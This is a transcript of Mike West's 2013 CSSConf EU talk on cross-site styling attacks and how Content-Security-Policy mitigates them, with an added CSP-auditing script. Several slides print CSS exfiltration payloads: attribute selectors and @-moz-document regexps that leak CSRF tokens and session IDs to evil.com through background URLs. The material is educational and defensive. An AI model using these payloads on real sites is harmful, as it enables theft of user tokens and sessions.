
XSS (No, the _other_ "s") - CSSConf EU 2013

Mike West
September 13, 2013


Cross-site scripting attacks are dangerous, and common enough that you're all probably familiar with them. Unfortunately that last word, "scripting", has ensured that our collective understanding of injection attacks remains fundamentally tied up with JavaScript. Cross-site _styling_ is actually more capable than you might expect; it's quite possible to exfiltrate sensitive data (like passwords!) without any script at all. This talk will walk through some of the cleverly malicious activity that CSS makes possible, and discuss some mechanisms for mitigating the risk that your sites and applications might be affected.


Transcript

  1. XSS. (No, the other "S") Mike West https://mikewest.org G+: mkw.st/+ Twitter: @mikewest Slides: https://mkw.st/r/cssconfeu13

  2. Content Injection is scary.

  3. <style> p { color: {{USER_COLOR}}; } </style>
     <p> Hello {{USER_NAME}}, view your <a href="{{USER_URL}}">Account</a>. </p>
     <script> var id = {{USER_ID}}; </script>
     <!-- DEBUG: {{INFO}} -->

  4. scheme://host:port

  5. Problem solved!

  6. http://www.nds.rub.de/media/emma/veroeffentlichungen/2012/08/16/scriptlessAttacks-ccs2012.pdf goo.gl/WvqNfI

  7. http://contextis.co.uk/files/Browser_Timing_Attacks.pdf goo.gl/mnOlI6

  8. 1. Injection 2. Execution 3. Exfiltration

  9. Defacement, Phishing, etc.

  10. Steal a CSRF token: <input type="hidden" name="csrf" value="123">

  11. #csrf[value='0'] #csrf[value='1'] #csrf[value='01'] #csrf[value='11'] #csrf[value='001'] #csrf[value='101'] #csrf[value='011'] ... #csrf[value='111111111']

  12. #csrf[value='0'] { background: url(//evil.com/?csrf=0); }

  13. http://eaea.sirdarckcat.net/cssar/v2/

  14. Steal a GET parameter: http://example.com/?PHPSESSID=123456 FF-Only, sorry: https://bugs.webkit.org/show_bug.cgi?id=51172

  15. @-moz-document regexp(".*PHPSESSID=0.*") { background: url(//evil.com/?sess=0,1); }
      @-moz-document regexp(".*PHPSESSID=.0.*") { background: url(//evil.com/?sess=0,2); }
      ...
      http://html5sec.org/cssession/

  16. Steal arbitrary attributes. <a href="/" data-secret="12345">

  17. http://html5sec.org/webkit/test.html

  18. Contextual Alternatives http://ie.microsoft.com/testdrive/graphics/opentype/opentype-monotype/index.html goo.gl/qE08aW

  19. http://traumwerk.stanford.edu/philolog/2009/10/homers_odyssey_in_art_sirens_f.html

  20. None
  21. http://w3.org/TR/CSP11

  22. Content-Security-Policy: default-src 'none'; style-src https://mikewestdotorg.hasacdn.net; frame-src https://www.youtube.com https://www.speakerdeck.com; script-src https://mikewestdotorg.hasacdn.net https://ssl.google-analytics.com; img-src 'self' https://mikewestdotorg.hasacdn.net https://ssl.google-analytics.com; font-src https://mikewestdotorg.hasacdn.net

  23. Content-Security-Policy: default-src ...; script-src ...; object-src ...; style-src ...; img-src ...; media-src ...; frame-src ...; font-src ...; connect-src ...; sandbox ...; report-uri https://example.com/reporter.cgi

  24. Content-Security-Policy-Report-Only: default-src https:; report-uri https://example.com/csp-violations
      {
        "csp-report": {
          "document-uri": "http://example.org/page.html",
          "referrer": "http://evil.example.com/haxor.html",
          "blocked-uri": "http://evil.example.com/img.png",
          "violated-directive": "default-src 'self'",
          "original-policy": "...",
          "source-file": "http://example.com/script.js",
          "line-number": 10,
          "column-number": 11
        }
      }

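Slides 22 and 24 show style-src doing the defensive work against the scriptless attacks above. The following is an added example, not code from the talk: it parses a Content-Security-Policy header and flags the style-src settings that would still let an injected stylesheet apply (no directive at all, 'unsafe-inline', a wildcard, or a scheme-only source such as the `https:` on slide 24). The fallback from style-src to default-src follows the CSP spec; the clean policy string is slide 22's, and the weak one is constructed for the demonstration.

```javascript
// Added example, not from the talk: audit a Content-Security-Policy header for
// the style-src weaknesses that leave room for scriptless CSS exfiltration.
// Per CSP, style-src falls back to default-src when absent; with neither set,
// stylesheets and inline styles are allowed from anywhere.

function parsePolicy(header) {
  const directives = {};
  for (const part of header.split(';')) {
    const tokens = part.trim().split(/\s+/).filter(Boolean);
    if (tokens.length === 0) continue;
    const name = tokens[0].toLowerCase();
    if (!(name in directives)) directives[name] = tokens.slice(1); // first one wins
  }
  return directives;
}

// Returns a list of findings; an empty list means styles are limited to
// explicitly named origins and injected inline styles are not applied.
function auditStyleSrc(header) {
  const d = parsePolicy(header);
  const sources = d['style-src'] || d['default-src'];
  if (!sources) {
    return ['no style-src or default-src: styles allowed from any source, inline included'];
  }
  const findings = [];
  for (const src of sources) {
    const s = src.toLowerCase();
    if (s === "'unsafe-inline'") {
      findings.push("'unsafe-inline': injected <style> blocks and style attributes are applied");
    } else if (s === '*') {
      findings.push('wildcard source: stylesheets may be loaded from any host');
    } else if (/^[a-z][a-z0-9+.-]*:$/.test(s)) {
      findings.push(`scheme-only source ${src}: any ${src} host may serve stylesheets`);
    }
  }
  return findings;
}

// Slide 22's policy: style-src restricted to a single CDN host.
const SLIDE22_POLICY = "default-src 'none'; style-src https://mikewestdotorg.hasacdn.net; " +
  "frame-src https://www.youtube.com https://www.speakerdeck.com; " +
  "script-src https://mikewestdotorg.hasacdn.net https://ssl.google-analytics.com; " +
  "img-src 'self' https://mikewestdotorg.hasacdn.net https://ssl.google-analytics.com; " +
  "font-src https://mikewestdotorg.hasacdn.net";

// Constructed weak policy: no style-src, so it falls back to a default-src that allows inline.
const WEAK_POLICY = "default-src 'self' 'unsafe-inline'; script-src 'self'";

console.log('slide 22:', auditStyleSrc(SLIDE22_POLICY)); // []
console.log('weak:', auditStyleSrc(WEAK_POLICY));        // one 'unsafe-inline' finding
```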
  25. <script> function handleClick() { ... } </script>
      <button onclick="handleClick()">Click me!</button>
      <a href="javascript:handleClick()">Click me!</a>

  26. <!-- index.html -->
      <script src="clickHandler.js"></script>
      <button class="clickr">Click me!</button>
      <a href="#" class="clickr">Click me!</a>
      <!-- clickHandler.js -->
      function handleClick() { ... }
      function init() {
        // querySelectorAll returns a NodeList; index through it (a for...in loop
        // would walk property names such as "length", not the elements).
        var els = document.querySelectorAll('.clickr');
        for (var i = 0; i < els.length; i++) els[i].addEventListener('click', handleClick);
      }
      // Attach the handlers once the markup has been parsed.
      document.addEventListener('DOMContentLoaded', init);

  27. http://www.html5rocks.com/en/tutorials/security/content-security-policy/ https://mkw.st/r/csp

  28. https://mkw.st/r/cssconfeu13 Danke! Mike West https://mikewest.org G+: mkw.st/+ Twitter: @mikewest